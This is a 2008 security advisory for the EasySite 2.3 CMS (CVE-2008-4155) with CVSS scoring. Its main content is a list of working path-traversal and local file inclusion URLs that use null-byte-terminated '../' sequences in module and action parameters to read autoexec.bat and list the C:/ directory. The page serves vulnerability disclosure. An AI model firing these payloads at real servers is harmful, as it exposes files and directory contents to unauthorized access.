Bug: EasySite 2.3 Multiple Remote Vulnerabilities ( Ascii Version )

Search:
WLB2

EasySite 2.3 Multiple Remote Vulnerabilities

Published
Credit
Risk
2008.09.22
SirGod
High
CWE
CVE
Local
Remote
CWE-22
CVE-2008-4155
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.8/10
6.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
None
None

####################################################################
[+] EasySite v2.3 Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN
####################################################################

[+] Local File Inclusion

http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00

And many others...

This will open autoexec.bat

[+] Arbitrary View Folder Contents

You can view the folder contents and the content of files view via LFI.

http://localhost/www/index.php?module=../../../

http://localhost/inc/vmenu.php?module=../../../

This will open C:/ directory and will show all the files from C:/ .

Example :

* BOOTSECT.BAK
* BcBtRmv.log
* IO.SYS
* MSDOS.SYS
* autoexec.bat
* bootmgr
* config.sys
* grldr
* hiberfil.sys
* pagefile.sys

####################################################################

References:

http://www.securityfocus.com/bid/30784
http://www.milw0rm.com/exploits/6288

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version